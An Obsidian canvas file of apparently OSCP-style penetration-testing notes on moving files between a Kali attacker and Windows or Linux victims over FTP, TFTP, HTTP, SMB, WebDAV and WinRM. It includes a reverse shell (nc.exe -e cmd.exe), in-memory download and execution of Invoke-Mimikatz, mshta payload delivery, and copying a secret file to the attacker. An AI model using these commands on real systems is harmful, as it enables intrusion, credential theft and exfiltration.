{
	"nodes":[
		{"id":"b29a79d5efab278c","type":"group","x":-9040,"y":-4880,"width":3120,"height":6700,"label":"KALI ATTACKER"},
		{"id":"e46cd9f080f51d49","type":"group","x":-4260,"y":-2080,"width":1947,"height":4800,"label":"WINDOWS VICTIM"},
		{"id":"c4faf064ac0e526f","type":"group","x":-4260,"y":-4960,"width":1947,"height":2600,"label":"LINUX VICTIM"},
		{"id":"e0111265ef37d27f","type":"text","text":"```bash\n$ sudo systemctl start ssh\n```","x":-8039,"y":-4749,"width":318,"height":60},
		{"id":"b127fa2a6054dbd5","type":"text","text":"","x":-6501,"y":-4552,"width":82,"height":86,"color":"#5c5447"},
		{"id":"a373b44c49f13385","type":"text","text":"```bash\n# mount a ftp host as a local directory \n$ curlftpfs -o nonempty ftp://<host>/ <mount_point>  \n```","x":-8145,"y":-3673,"width":551,"height":84},
		{"id":"e817f8d05ec13e2b","type":"text","text":"# FTP\n\n\n```bash\ncmd> ftp 192.168.100.100 # access ftp server\nftp>User: anonymous\nftp>(password: )\nftp> binary\nftp> get <filename>\nftp> put <filename>\n```","x":-8145,"y":-3560,"width":551,"height":240},
		{"id":"388fd8d7c7d5baf7","type":"text","text":"# TFTP\n```bash\ncmd> tftp <IP/Hostname> # access TFTP server\ntftp> get <file_to_download>\ntftp> put <file_to_upload>\n```\n","x":-8145,"y":-4300,"width":551,"height":171},
		{"id":"8f66005a5729f470","type":"text","text":"```bash\nauxiliary/server/ftp\nset FTPROOT # ftp root folder\n```","x":-7260,"y":-3320,"width":388,"height":97},
		{"id":"0be20156db785810","type":"text","text":"# (Almost) All The Ways to File Transfer\nhttps://juggernaut-sec.com/linux-file-transfers-for-hackers/\nhttps://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65","x":-8389,"y":2071,"width":745,"height":179},
		{"id":"cbe4c9b7ac28bfc1","type":"text","text":"# transport exe by CLI\n\n```bash\n$ upx -9 nc.exe # kompresja plików exe, -9 compress better\n# upx --best --ultra-brute -f rTCPenc.exe -o rTCPenc2.exe\n$ exe2hex -x nc.exe -p nc.PS # -x <EXE_FILE> -p <OUT_AS_PS> / -b <OUT_AS_BAT>\n$ less nc.PS # plix exe jako polecenie PS\n$ cat nc.PS | tmux loadb - # załadowanie kemndy do bufora tmux\n# można wkleić poprzez terminal, na maszynie powinien pojawić się plik nc.exe \n```","x":-8389,"y":2310,"width":800,"height":311},
		{"id":"922e2a8cfbdfcb22","type":"text","text":"# $ msf - Payload Deploy\n```bash\n# module creates a server which hosts a payload\nexploit/multi/script/webdelivery\n```\n```bash\n# hosts an HTML Application (HTA) that when opened will run a payload via Powershell\nexploit/windows/misc/hta_server\n```\n```powershell\n# execute HTA application\nPS> mshta.exe http://<IP>:<port>/<generatet_payload.hta> # run HTA application from powershell\n```","x":-7491,"y":2060,"width":800,"height":381},
		{"id":"a053b513fd408255","type":"text","text":"```bash\n# TFTP server\n$ atftpd --daemon --bind-addres <IP> --port 69 <folder_to_share>\n```\n```bash\n# msf TFTP server\nauxiliary/server/tftp\nset TFTPROOT # set tftp server root\n```","x":-8200,"y":-3980,"width":660,"height":220},
		{"id":"8f0864458b6db583","type":"text","text":"# HTTP","x":-8960,"y":-3079,"width":250,"height":60},
		{"id":"e828ec4a991ed488","type":"text","text":"# FTP","x":-8960,"y":-3428,"width":250,"height":66},
		{"id":"24f976bdf0b0ba3f","type":"text","text":"# SSH","x":-8960,"y":-4542,"width":250,"height":66},
		{"id":"3b570589efbf58df","type":"file","file":"NOTES/99. TOOLS/ssh/scp.md","x":-8220,"y":-4609,"width":820,"height":269},
		{"id":"4927fd7ac9b5e1b5","type":"text","text":"# TFTP","x":-8960,"y":-4069,"width":250,"height":60},
		{"id":"10b21ecd543aae45","type":"text","text":"","x":-4205,"y":-3171,"width":82,"height":86,"color":"#6704fb"},
		{"type":"text","text":"```bash\n$ curl http://<IP-ATTACKER>/<FILE> -o <file>\n```","id":"cfe4f175fa81fcff","x":-3760,"y":-3443,"width":700,"height":50},
		{"id":"8bcfbfc8858bc786","type":"file","file":"NOTES/99. TOOLS/powercat/powercat.ps1_file_transfer.md","x":-3882,"y":-2779,"width":914,"height":420},
		{"type":"text","text":"```bash\n$ wget http://<IP-ATTACKER>/<FILE> \n```","id":"577e91db20f9ed61","x":-3760,"y":-3370,"width":700,"height":50},
		{"id":"28f1ed07a79d78c7","type":"text","text":"","x":-4205,"y":-3798,"width":82,"height":86,"color":"1"},
		{"id":"12751d8da40086d8","type":"text","text":"","x":-4205,"y":-3534,"width":82,"height":86,"color":"5"},
		{"id":"e0366ff4d7ee3def","type":"text","text":"```bash\n$ cat < /dev/tcp/10.10.10.10/80 # receive file\n```","x":-3736,"y":-3264,"width":553,"height":93},
		{"type":"text","text":"```bash\nsocat -u FILE:test.txt TCP:127.0.0.1:9876\n```","id":"fa5b47ed043a1357","x":-3738,"y":-3158,"width":555,"height":60},
		{"id":"f8a82b1454bd991b","type":"file","file":"NOTES/99. TOOLS/netcat/netcat_file_transfer.md","x":-3705,"y":-3085,"width":560,"height":306},
		{"id":"4bc3b4900d4dce02","type":"text","text":"# OTHER","x":-2680,"y":-3158,"width":250,"height":60},
		{"id":"2c89651329f2cc32","type":"text","text":"# HTTP","x":-2680,"y":-3523,"width":291,"height":60},
		{"id":"0739720af7ac32a1","type":"text","text":"","x":-6501,"y":-4081,"width":82,"height":86,"color":"2"},
		{"id":"7364ed1dad0e4c90","type":"text","text":"# UPLOAD\nhttps://gtfobins.github.io/#+file%20upload","x":-3668,"y":-4820,"width":478,"height":100},
		{"id":"37902f614b1b8cd2","type":"text","text":"# SSH","x":-2680,"y":-4507,"width":291,"height":66},
		{"id":"0941c9b23a4db771","type":"text","text":"# TFTP","x":-2680,"y":-4120,"width":291,"height":60},
		{"id":"705c5f1edabcb3fc","type":"text","text":"# FTP\n\n\n```bash\ncmd> ftp 192.168.100.100 # access ftp server\nftp>User: anonymous\nftp>(password: )\nftp> binary\nftp> get filename\n```","x":-3705,"y":-3865,"width":551,"height":219},
		{"id":"a902d989ba2c5463","type":"text","text":"# TFTP\n```bash\ncmd> ftp 192.168.100.100 # access TFTP server\nftp>User: anonymous\nftp>(password: )\nftp> binary\nftp> get filename\n```\n```PS\n# enable tftp in Windows in command line\ncmd> pkgmgr /iu:\"TFTP\"\ntftp -i 192.168.10.10 GET/PUT password.txt\n```","x":-3705,"y":-4301,"width":551,"height":344},
		{"id":"58626e381b26131c","type":"text","text":"# FTP","x":-2680,"y":-3780,"width":291,"height":50},
		{"id":"353cd42f1ae0dd03","type":"text","text":"```bash\n$ sudo systemctl start ssh\n```","x":-3588,"y":-4501,"width":318,"height":60},
		{"id":"8984d0d22cad952e","type":"text","text":"# DOWNLOAD\nhttps://gtfobins.github.io/#+file%20download","x":-3668,"y":-4660,"width":478,"height":90},
		{"id":"44aae3d837c1d2d5","type":"text","text":"","x":-6501,"y":-3092,"width":82,"height":86,"color":"5"},
		{"id":"142418ca45d31848","type":"text","text":"","x":-6501,"y":-3438,"width":82,"height":86,"color":"1"},
		{"id":"edb1d8a9a63cda22","type":"text","text":"# GTFOBins","x":-4205,"y":-4770,"width":245,"height":170},
		{"id":"764934537ffe0b9a","type":"text","text":"","x":-4205,"y":-4474,"width":82,"height":86,"color":"#5c5447"},
		{"id":"7a95507055653503","type":"text","text":"","x":-4205,"y":-4133,"width":82,"height":86,"color":"2"},
		{"id":"a859a1902325b4d1","type":"file","file":"NOTES/2. Windows/Powershell/Powershell_inmemory_file_download_and_execution.md","x":-1760,"y":-1268,"width":1305,"height":1940},
		{"id":"85bbd964feb183dc","type":"text","text":"# FTP\n\n\n```bash\ncmd> ftp 192.168.100.100 # access ftp server\nftp>User: anonymous\nftp>(password: )\nftp> binary\nftp> dir # list content\nftp> get <filename>\nftp> put <filename>\n```\n```bash\ncmd> ftp -s:ftp_commands.txt\n\ncmd> type ftp_commands.txt\nopen <IP-ATTACKER> \n<USERNAME>\n<PASSWORD>\nbinary\nput file.exe\ndisconnect\nquit\nbye\n```","x":-3704,"y":-1180,"width":551,"height":307},
		{"id":"82070757e3744bf2","type":"text","text":"# TFTP","x":-2680,"y":-1428,"width":291,"height":60},
		{"id":"8109b9a37fc30496","type":"text","text":"# HTTP","x":-2680,"y":-315,"width":291,"height":115},
		{"id":"689bb68f13bb3cb1","type":"text","text":"# FTP","x":-2680,"y":-1060,"width":291,"height":66},
		{"id":"02d5ddecd0c891b2","type":"text","text":"# TFTP\n```PS\n# enable tftp in Windows in command line\ncmd> pkgmgr /iu:\"TFTP\"\n\n# enable the TFTP client feature, requires elevation\nPS> Enable-WindowsOptionalFeature -Online -FeatureName TFTP\n\ncmd> tftp -i 192.168.10.10 GET/PUT password.txt\n```\n```PS\n# not sure \ntftp 192.168.151.88 \ntftp> get x\ntftp> put xx\n```","x":-3800,"y":-1640,"width":800,"height":380},
		{"id":"ac79667482b165ff","type":"text","text":"# UPLOAD\nhttps://lolbas-project.github.io/#/upload","x":-3665,"y":-1911,"width":473,"height":85},
		{"id":"cc64414a828d1d64","type":"text","text":"# DOWNLOAD\nhttps://lolbas-project.github.io/#/download","x":-3665,"y":-1791,"width":473,"height":85},
		{"id":"248307460426ff23","type":"text","text":"","x":-4205,"y":-1441,"width":82,"height":86,"color":"2"},
		{"id":"ceaa37cd27ed57de","type":"text","text":"# LOLBAS","x":-4240,"y":-1876,"width":185,"height":170},
		{"id":"dc83a93c59c1561b","type":"text","text":"","x":-4205,"y":-1070,"width":82,"height":86,"color":"1"},
		{"id":"e5e73cbb9227e25f","type":"text","text":"","x":-4205,"y":-341,"width":82,"height":86,"color":"5"},
		{"id":"f15b9157baf1af18","type":"file","file":"NOTES/99. TOOLS/powercat/powercat.ps1_file_transfer.md","x":-8336,"y":-880,"width":1376,"height":450},
		{"id":"a7ae5c5f1a12113f","type":"file","file":"NOTES/99. TOOLS/impacket/impacket_smbserver.md","x":-8310,"y":11,"width":860,"height":391},
		{"id":"610ae4d9a3e3e59c","type":"file","file":"NOTES/99. TOOLS/smbclient/smbclient.md","x":-8310,"y":471,"width":860,"height":400},
		{"id":"92a60955902ef280","type":"file","file":"NOTES/99. TOOLS/evil-WinRM/evil-WinRM file transfer.md","x":-8280,"y":971,"width":800,"height":221},
		{"id":"c11657971c68d0c8","type":"file","file":"NOTES/99. TOOLS/xfreerdp/xfreerdp.md","x":-8440,"y":-364,"width":1120,"height":355},
		{"id":"19d3cf08c1e4d731","type":"text","text":"# RDP","x":-8960,"y":-197,"width":250,"height":102},
		{"id":"5f6d69058c1df584","type":"text","text":"","x":-6501,"y":376,"width":82,"height":86,"color":"4"},
		{"id":"ace138046dec0e5c","type":"text","text":"# SMB","x":-8960,"y":436,"width":250,"height":60},
		{"id":"c526446f77b5adc0","type":"text","text":"","x":-6501,"y":-229,"width":82,"height":86,"color":"#2c4b2a"},
		{"id":"79b7056eda45bece","type":"text","text":"","x":-6501,"y":1143,"width":82,"height":86,"color":"3"},
		{"id":"2388258480da47ff","type":"text","text":"# WinRM","x":-8960,"y":1180,"width":250,"height":50},
		{"id":"b3283e822fc6049e","type":"file","file":"NOTES/99. TOOLS/evil-WinRM/evil-WinRM execute binary directly from attacker.md","x":-8280,"y":1230,"width":800,"height":381},
		{"type":"text","text":"```bash\nsocat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt\n```","id":"55dc5a550a18d09d","x":-8241,"y":-1300,"width":722,"height":60},
		{"id":"b7fc2bcb6c9460d5","type":"file","file":"NOTES/99. TOOLS/netcat/netcat_file_transfer.md","x":-8160,"y":-1220,"width":980,"height":320},
		{"id":"0d32a9cebce85df9","type":"text","text":"","x":-6501,"y":-1122,"width":82,"height":86,"color":"#6704fb"},
		{"id":"14dbf9ce7e2d7606","type":"text","text":"# OTHER","x":-8960,"y":-1109,"width":250,"height":60},
		{"type":"text","text":"```bash\nsudo socat TCP4-LISTEN:443,fork file:<FILE-NAME>\n```","id":"afaa0e6451d059ce","x":-8240,"y":-1360,"width":722,"height":60},
		{"id":"5847cd09d10f77cd","type":"text","text":"","x":-6501,"y":-2252,"width":82,"height":86,"color":"6"},
		{"id":"d1d0387d954bb389","type":"text","text":"![[WebDAV#wsgidav]]","x":-8280,"y":-2880,"width":778,"height":331},
		{"id":"5f3831775737b9b8","type":"text","text":"![[WebDAV#$ cadaver]]","x":-8280,"y":-2480,"width":778,"height":419},
		{"id":"16fde3bfe02bb274","type":"text","text":"# WebDAV","x":-8600,"y":-2744,"width":250,"height":60},
		{"id":"5cd2fa513a515b48","type":"text","text":"# deploy http server\n```python\n$ python -m SimpleHTTPServer 80 # python 2.x\n$ python -m http.server 80 # python 3.x\n$ php -S 0.0.0.0:80\n$ ruby -run -e httpd . -p 9000\n$ systemctl start apache2.service\n$ systemctl start nginx.service\n```\n\n# PHP webserver with upload service\n```php\n<?php\n$uploaddir = '/var/www/uploads/';\n$uploadfile = $uploaddir . $_FILES['file']['name'];\nmove_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)\n?>\n```\n```bash\n# to activate server\n$ sudo php -S 0.0.0.0:80\n$ systemctl start apache2.service\n```","x":-8280,"y":-3184,"width":800,"height":271},
		{"type":"text","text":"```bash\n$ curl -F \"file=@/path/to/your/file\" http://yourserver.com/upload.php\n```","id":"3426c0f056b4fb79","x":-3760,"y":-3587,"width":700,"height":50},
		{"type":"text","text":"```bash\n$ curl -T test_file http://<server>[:<port>] # upload to webdav server\n```","id":"8b2067f7b664e836","x":-3760,"y":-3515,"width":700,"height":50},
		{"id":"6595f78a9a51d006","type":"text","text":"# copy via gui","x":-3554,"y":1711,"width":250,"height":102},
		{"id":"d4eb8e826d762b25","type":"text","text":"# accesa via file explorer using  address \\\\\\\\<host_IP>","x":-3813,"y":2244,"width":768,"height":55},
		{"id":"d5cbd50dea683212","type":"text","text":"# WinRM","x":-2680,"y":2365,"width":291,"height":50},
		{"id":"6869e7c25af89740","type":"text","text":"","x":-4205,"y":1719,"width":82,"height":86,"color":"#2c4b2a"},
		{"id":"a458f20c2b52235b","type":"text","text":"## Windows\n```powershell\ncmd> copy \\\\172.16.1.30\\hax\\nc.exe C:\\temp\\nc.exe # download\ncmd> copy C:\\temp\\supersecret.txt \\\\172.16.1.30\\hax\\supersecret.txt # upload\n```\n\nSince Windows handles UNC paths, you can just treat the `hax` share as if it’s just a local folder from Windows. Basic Windows file commands like `dir`, `copy`, `move`, etc. all just work\n```powershell\ncmd> net view \\\\<IP> # check share\ncmd> dir \\\\<IP>\\<director_yname> # list content of directory fromm share\ncmd> \\\\172.16.1.30\\hax\\nc.exe 172.16.1.30 443 -e cmd.exe # execute directlu from smb share\n```\n","x":-3813,"y":1833,"width":768,"height":356},
		{"id":"5c91c8464b4e05c6","type":"text","text":"","x":-4205,"y":1998,"width":82,"height":86,"color":"4"},
		{"id":"f51a58423508dde4","type":"text","text":"","x":-4205,"y":2347,"width":82,"height":86,"color":"3"},
		{"type":"text","text":"```cmd\nsocat -u FILE:test.txt TCP:127.0.0.1:9876\n```","id":"16f6d9e5298883f1","x":-3853,"y":696,"width":680,"height":60},
		{"id":"e71dc87b9614af67","type":"file","file":"NOTES/99. TOOLS/netcat/netcat_file_transfer.md","x":-3793,"y":776,"width":560,"height":320},
		{"id":"51d920476a8d5baf","type":"text","text":"","x":-4205,"y":1008,"width":82,"height":86,"color":"#6704fb"},
		{"id":"01651eca08353a03","type":"file","file":"NOTES/99. TOOLS/powercat/powercat.ps1_file_transfer.md","x":-3939,"y":1156,"width":914,"height":420},
		{"type":"text","text":"```cmd\nsocat TCP4:10.11.0.4:443 file:<FILE-NAME>,create\n```","id":"7bfba86404f03eb9","x":-3853,"y":600,"width":680,"height":60},
		{"id":"34cac204324cf8af","type":"text","text":"# OTHER","x":-2680,"y":1021,"width":291,"height":60},
		{"id":"ca4ec3860ac8f66d","type":"text","text":"# SMB","x":-2680,"y":2011,"width":291,"height":60},
		{"id":"ea6075bd93131c11","type":"text","text":"# RDP","x":-2680,"y":1729,"width":291,"height":67},
		{"id":"01625cf8b57acdc5","type":"text","text":"# Powershell in memory execute (only PS scripts)\n```powershell\nPS> iex (New-Object Net.Webclient).DownloadString(\"http://attacker_url/script.ps1\")\n```\n```powershell\ncmd> powershell.exe -nop -ep bypass -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.165/Invoke-Mimikatz.ps1')\"\n```\n\n\n\n\n\n\n\n","x":-4053,"y":-767,"width":1080,"height":180},
		{"id":"a5b81207f2148c47","type":"file","file":"NOTES/2. Windows/Powershell/Powershell_to_disc_file_download.md","x":-4053,"y":-537,"width":1080,"height":423},
		{"id":"796586347d87b926","type":"text","text":"# HTTP - Windows\n\n## Upload to attack machine\n```Powershell\n# upload to webdav server (PUT required for overwrite/write file)\nPS> (New-Object System.Net.WebClient).UploadFile('http://<IP>[:port]/<filename>', \"PUT\", '<file_path>')\nPS> iwr -Uri \"http://<IP>[:port]/<filename>\" -InFile \"C:\\Users\\kali\\Desktop\\asd.bat\" -Method Put\n\ncmd>/PS> curl.exe -F 'file=@C:\\\\temp\\\\supersecret.txt' http://<IP>/<filename> # performs a `POST` with `multipart/form-data`\ncmd>/PS> curl.exe -T test_file http://<server>[:<port>] # upload the file using a `PUT`\n```\n```powershell\nnet use Z: http://<ip>:<port>/ /user:anonymous \"\"\ncopy C:\\path\\file.txt Z:\\file.txt\nnet use Z: /delete\n```","x":-4053,"y":-64,"width":1080,"height":384},
		{"id":"e3b260a454918604","type":"text","text":"# WebDAV","x":-2825,"y":0,"width":291,"height":50},
		{"id":"0c38f8d71e9bec6a","type":"text","text":"","x":-4205,"y":380,"width":82,"height":86,"color":"6"},
		{"id":"a987184e0f8ed957","type":"text","text":"# accesa via file explorer using  address http://<host_IP>[/DavWWWRoot]","x":-4053,"y":380,"width":1080,"height":86}
	],
	"edges":[
		{"id":"ed321b25862a43f9","fromNode":"4927fd7ac9b5e1b5","fromSide":"right","toNode":"388fd8d7c7d5baf7","toSide":"left","toEnd":"none"},
		{"id":"e777d2ffcfbfa3fb","fromNode":"8f0864458b6db583","fromSide":"right","toNode":"5cd2fa513a515b48","toSide":"left","toEnd":"none"},
		{"id":"c974b66e31ea1ee3","fromNode":"2388258480da47ff","fromSide":"right","toNode":"b3283e822fc6049e","toSide":"left","toEnd":"none"},
		{"id":"3022b014709e2eb9","fromNode":"2388258480da47ff","fromSide":"right","toNode":"92a60955902ef280","toSide":"left","toEnd":"none"},
		{"id":"dfec277c0a979716","fromNode":"ace138046dec0e5c","fromSide":"right","toNode":"a7ae5c5f1a12113f","toSide":"left","toEnd":"none"},
		{"id":"13af81170302d8e5","fromNode":"16fde3bfe02bb274","fromSide":"right","toNode":"d1d0387d954bb389","toSide":"left","toEnd":"none"},
		{"id":"f64facdf15cedeef","fromNode":"16fde3bfe02bb274","fromSide":"bottom","toNode":"5f3831775737b9b8","toSide":"left","toEnd":"none"},
		{"id":"961539311253de35","fromNode":"24f976bdf0b0ba3f","fromSide":"right","toNode":"3b570589efbf58df","toSide":"left","toEnd":"none"},
		{"id":"32ef0c677b5dcf57","fromNode":"3b570589efbf58df","fromSide":"right","toNode":"b127fa2a6054dbd5","toSide":"bottom","fromEnd":"arrow"},
		{"id":"e57570e0c6e5f390","fromNode":"b127fa2a6054dbd5","fromSide":"top","toNode":"e0111265ef37d27f","toSide":"right"},
		{"id":"9946fbfed47e9fa6","fromNode":"e0111265ef37d27f","fromSide":"left","toNode":"24f976bdf0b0ba3f","toSide":"right","toEnd":"none"},
		{"id":"a4633177a85d30c7","fromNode":"388fd8d7c7d5baf7","fromSide":"right","toNode":"0739720af7ac32a1","toSide":"top","fromEnd":"arrow"},
		{"id":"cfc71b1ec83fdbd8","fromNode":"a053b513fd408255","fromSide":"left","toNode":"4927fd7ac9b5e1b5","toSide":"right","toEnd":"none"},
		{"id":"01efea1a525421e3","fromNode":"92a60955902ef280","fromSide":"right","toNode":"79b7056eda45bece","toSide":"top","fromEnd":"arrow"},
		{"id":"2fa3f7f6b9fa4d81","fromNode":"b3283e822fc6049e","fromSide":"right","toNode":"79b7056eda45bece","toSide":"bottom"},
		{"id":"50120e0b1fa383c7","fromNode":"a7ae5c5f1a12113f","fromSide":"right","toNode":"5f6d69058c1df584","toSide":"top","fromEnd":"arrow"},
		{"id":"5bb575d174c14697","fromNode":"610ae4d9a3e3e59c","fromSide":"right","toNode":"5f6d69058c1df584","toSide":"bottom","fromEnd":"arrow"},
		{"id":"c4e7281f4ab265d7","fromNode":"ace138046dec0e5c","fromSide":"right","toNode":"610ae4d9a3e3e59c","toSide":"left"},
		{"id":"ca942c6438a8a72c","fromNode":"5cd2fa513a515b48","fromSide":"right","toNode":"44aae3d837c1d2d5","toSide":"top"},
		{"id":"a6db28597d8f4077","fromNode":"19d3cf08c1e4d731","fromSide":"right","toNode":"c11657971c68d0c8","toSide":"left","toEnd":"none"},
		{"id":"ae23cb8f9e107719","fromNode":"c11657971c68d0c8","fromSide":"right","toNode":"c526446f77b5adc0","toSide":"left","fromEnd":"arrow"},
		{"id":"0ee3f2fff804c6d9","fromNode":"b127fa2a6054dbd5","fromSide":"right","toNode":"764934537ffe0b9a","toSide":"left","toEnd":"none"},
		{"id":"43cc52a2eb26678a","fromNode":"764934537ffe0b9a","fromSide":"right","toNode":"353cd42f1ae0dd03","toSide":"left","fromEnd":"arrow"},
		{"id":"5251a447a665e7ac","fromNode":"353cd42f1ae0dd03","fromSide":"right","toNode":"37902f614b1b8cd2","toSide":"left","toEnd":"none"},
		{"id":"bc006e46894dcb1a","fromNode":"58626e381b26131c","fromSide":"left","toNode":"705c5f1edabcb3fc","toSide":"right","toEnd":"none"},
		{"id":"2b724290194fb27c","fromNode":"28f1ed07a79d78c7","fromSide":"right","toNode":"705c5f1edabcb3fc","toSide":"left","fromEnd":"arrow"},
		{"id":"c65cfbf489c30aae","fromNode":"142418ca45d31848","fromSide":"right","toNode":"28f1ed07a79d78c7","toSide":"left","toEnd":"none"},
		{"id":"4e96e43b575f575e","fromNode":"a902d989ba2c5463","fromSide":"left","toNode":"7a95507055653503","toSide":"right","fromEnd":"arrow"},
		{"id":"70ae95e9ec118d8b","fromNode":"0941c9b23a4db771","fromSide":"left","toNode":"a902d989ba2c5463","toSide":"right","toEnd":"none"},
		{"id":"317e8c8b6896b7e1","fromNode":"0739720af7ac32a1","fromSide":"right","toNode":"7a95507055653503","toSide":"left","toEnd":"none"},
		{"id":"09cb03867df6b22d","fromNode":"12751d8da40086d8","fromSide":"bottom","toNode":"cfe4f175fa81fcff","toSide":"left"},
		{"id":"b5c3685defca4f53","fromNode":"12751d8da40086d8","fromSide":"bottom","toNode":"577e91db20f9ed61","toSide":"left"},
		{"id":"0d0d4fb5ea6862f2","fromNode":"44aae3d837c1d2d5","fromSide":"right","toNode":"12751d8da40086d8","toSide":"left","toEnd":"none"},
		{"id":"fec596d99a90b64a","fromNode":"cfe4f175fa81fcff","fromSide":"right","toNode":"2c89651329f2cc32","toSide":"left","toEnd":"none"},
		{"id":"09d8e84e258cf431","fromNode":"577e91db20f9ed61","fromSide":"right","toNode":"2c89651329f2cc32","toSide":"left","toEnd":"none"},
		{"id":"54217541272fc68d","fromNode":"dc83a93c59c1561b","fromSide":"right","toNode":"85bbd964feb183dc","toSide":"left","fromEnd":"arrow"},
		{"id":"b75228ad01a2ac0d","fromNode":"85bbd964feb183dc","fromSide":"right","toNode":"689bb68f13bb3cb1","toSide":"left","toEnd":"none"},
		{"id":"c220c2a6fcfad260","fromNode":"142418ca45d31848","fromSide":"right","toNode":"dc83a93c59c1561b","toSide":"left","toEnd":"none"},
		{"id":"4796791d592ebfd2","fromNode":"5c91c8464b4e05c6","fromSide":"right","toNode":"a458f20c2b52235b","toSide":"left","fromEnd":"arrow"},
		{"id":"346881852034cb9a","fromNode":"5f6d69058c1df584","fromSide":"right","toNode":"5c91c8464b4e05c6","toSide":"left","toEnd":"none"},
		{"id":"abe321d803951057","fromNode":"a458f20c2b52235b","fromSide":"right","toNode":"ca4ec3860ac8f66d","toSide":"left","toEnd":"none"},
		{"id":"f465ea3e84bd6c94","fromNode":"6869e7c25af89740","fromSide":"right","toNode":"6595f78a9a51d006","toSide":"left","fromEnd":"arrow"},
		{"id":"36fea154d22ebecb","fromNode":"6595f78a9a51d006","fromSide":"right","toNode":"ea6075bd93131c11","toSide":"left","toEnd":"none"},
		{"id":"93f32aad5d7bccc6","fromNode":"c526446f77b5adc0","fromSide":"right","toNode":"6869e7c25af89740","toSide":"left","toEnd":"none"},
		{"id":"7c562cf38300a858","fromNode":"f51a58423508dde4","fromSide":"right","toNode":"d5cbd50dea683212","toSide":"left","fromEnd":"arrow"},
		{"id":"a873f96f037f10a7","fromNode":"79b7056eda45bece","fromSide":"right","toNode":"f51a58423508dde4","toSide":"left"},
		{"id":"cc269b11f55810b0","fromNode":"e5e73cbb9227e25f","fromSide":"right","toNode":"a5b81207f2148c47","toSide":"left"},
		{"id":"c76c2fe8d15dc278","fromNode":"44aae3d837c1d2d5","fromSide":"right","toNode":"e5e73cbb9227e25f","toSide":"left","toEnd":"none"},
		{"id":"c63961ce3611bc27","fromNode":"a5b81207f2148c47","fromSide":"right","toNode":"8109b9a37fc30496","toSide":"left","toEnd":"none"},
		{"id":"8b7f82b0192e4b8e","fromNode":"e5e73cbb9227e25f","fromSide":"top","toNode":"01625cf8b57acdc5","toSide":"left"},
		{"id":"b6d0b4c2cfe28652","fromNode":"01625cf8b57acdc5","fromSide":"right","toNode":"8109b9a37fc30496","toSide":"left","toEnd":"none"},
		{"id":"2e4803999513503b","fromNode":"a859a1902325b4d1","fromSide":"left","toNode":"8109b9a37fc30496","toSide":"right","toEnd":"none"},
		{"id":"07a4fd31d27198d7","fromNode":"8109b9a37fc30496","fromSide":"left","toNode":"796586347d87b926","toSide":"right","toEnd":"none"},
		{"id":"f3d8fd6579e17db4","fromNode":"796586347d87b926","fromSide":"left","toNode":"e5e73cbb9227e25f","toSide":"bottom"},
		{"id":"1c49f93546f60a15","fromNode":"edb1d8a9a63cda22","fromSide":"top","toNode":"7364ed1dad0e4c90","toSide":"left"},
		{"id":"ecd1a10dfdcfbdeb","fromNode":"8984d0d22cad952e","fromSide":"left","toNode":"edb1d8a9a63cda22","toSide":"bottom"},
		{"id":"2339b75cc3c0ef76","fromNode":"ac79667482b165ff","fromSide":"left","toNode":"ceaa37cd27ed57de","toSide":"top"},
		{"id":"4eaaea5ee7281e6a","fromNode":"ceaa37cd27ed57de","fromSide":"bottom","toNode":"cc64414a828d1d64","toSide":"left"},
		{"id":"19dfd5d807a9925c","fromNode":"02d5ddecd0c891b2","fromSide":"left","toNode":"248307460426ff23","toSide":"right","fromEnd":"arrow"},
		{"id":"e446be4bbbd26c73","fromNode":"82070757e3744bf2","fromSide":"left","toNode":"02d5ddecd0c891b2","toSide":"right","toEnd":"none"},
		{"id":"a1f1d91736d945d2","fromNode":"248307460426ff23","fromSide":"left","toNode":"0739720af7ac32a1","toSide":"right","toEnd":"none"},
		{"id":"874ab5d3671eefa5","fromNode":"142418ca45d31848","fromSide":"left","toNode":"e817f8d05ec13e2b","toSide":"right","fromEnd":"arrow"},
		{"id":"9f7a0ed6404bbf4d","fromNode":"e828ec4a991ed488","fromSide":"right","toNode":"a373b44c49f13385","toSide":"left","toEnd":"none"},
		{"id":"4cbd713581e89f67","fromNode":"0c38f8d71e9bec6a","fromSide":"right","toNode":"a987184e0f8ed957","toSide":"left","fromEnd":"arrow"},
		{"id":"ec902c44102e7f5d","fromNode":"a987184e0f8ed957","fromSide":"right","toNode":"e3b260a454918604","toSide":"left","toEnd":"none"},
		{"id":"ae3cfad19bb0de00","fromNode":"d1d0387d954bb389","fromSide":"right","toNode":"44aae3d837c1d2d5","toSide":"left","fromEnd":"arrow"},
		{"id":"722316661e7b5d55","fromNode":"5847cd09d10f77cd","fromSide":"right","toNode":"0c38f8d71e9bec6a","toSide":"left","toEnd":"none"},
		{"id":"88c46de0a073bb54","fromNode":"5c91c8464b4e05c6","fromSide":"right","toNode":"d4eb8e826d762b25","toSide":"left","fromEnd":"arrow"},
		{"id":"e8f7631495076d98","fromNode":"d4eb8e826d762b25","fromSide":"right","toNode":"ca4ec3860ac8f66d","toSide":"left","toEnd":"none"},
		{"id":"71d7aa1e408fee3a","fromNode":"14dbf9ce7e2d7606","fromSide":"right","toNode":"b7fc2bcb6c9460d5","toSide":"left","toEnd":"none"},
		{"id":"a1d0a99558c3648f","fromNode":"b7fc2bcb6c9460d5","fromSide":"right","toNode":"0d32a9cebce85df9","toSide":"left","fromEnd":"arrow"},
		{"id":"99ab1afa364b6c0a","fromNode":"51d920476a8d5baf","fromSide":"right","toNode":"e71dc87b9614af67","toSide":"left","fromEnd":"arrow"},
		{"id":"dae157a0b225a41c","fromNode":"0d32a9cebce85df9","fromSide":"right","toNode":"51d920476a8d5baf","toSide":"left","toEnd":"none"},
		{"id":"350f1b410ee6e75d","fromNode":"10b21ecd543aae45","fromSide":"right","toNode":"f8a82b1454bd991b","toSide":"left","fromEnd":"arrow"},
		{"id":"72451c9f42a69b42","fromNode":"0d32a9cebce85df9","fromSide":"right","toNode":"10b21ecd543aae45","toSide":"left","toEnd":"none"},
		{"id":"f57f8de400161b8d","fromNode":"e71dc87b9614af67","fromSide":"right","toNode":"34cac204324cf8af","toSide":"left","toEnd":"none"},
		{"id":"3f46bfa418884446","fromNode":"f8a82b1454bd991b","fromSide":"right","toNode":"4bc3b4900d4dce02","toSide":"left","toEnd":"none"},
		{"id":"e75ab096309a8bf1","fromNode":"3426c0f056b4fb79","fromSide":"left","toNode":"12751d8da40086d8","toSide":"top"},
